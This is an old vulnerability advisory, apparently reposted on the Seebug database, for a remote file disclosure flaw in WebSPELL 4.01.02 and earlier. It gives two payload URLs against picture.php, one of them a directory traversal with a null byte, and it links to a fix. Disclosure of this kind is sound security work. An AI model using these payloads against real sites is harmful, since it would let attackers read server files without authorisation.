# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability<br /> # Discovered by: Trex<br /> # Visit: www.Trex-Online.net / www.UnderGround.ag<br /> # Comment: Happy easter!<br /> #<br /> # ___ ___<br /> # / / ___________________________<br /> # / / \\_/ / <br /> # \\__/ /\\__/ / GIVE ME A CARROT OR I WILL <br /> # O O/ BLOW UP YOUR HOUSE /<br /> # ___/ ^ \\___ / ___________________________/<br /> # \\___/ /_/<br /> # _/ \\_<br /> # __// \\__<br /> # /___/_/___<br /> #<br /> #<br /> #<br /> # Vulnerability 1:<br /> # Advantage: works independently from PHP version.<br /> # Disadvantage: works dependently from PHP option register_globals (= on).<br /> #<br /> # http://[SITE][PAHT]/picture.php?file=[FILE]<br /> #<br /> #<br /> #<br /> # Vulnerability 2:<br /> # Advantage: works independently from PHP option register_globals.<br /> # Disadvantage: works dependently from PHP versions (< 4.3.0).<br /> #<br /> # http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00<br /> #<br /> #<br /> #<br /> # Solution:<br /> # http://fixes.trex-online.net/picture.rar<br /> <br />
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论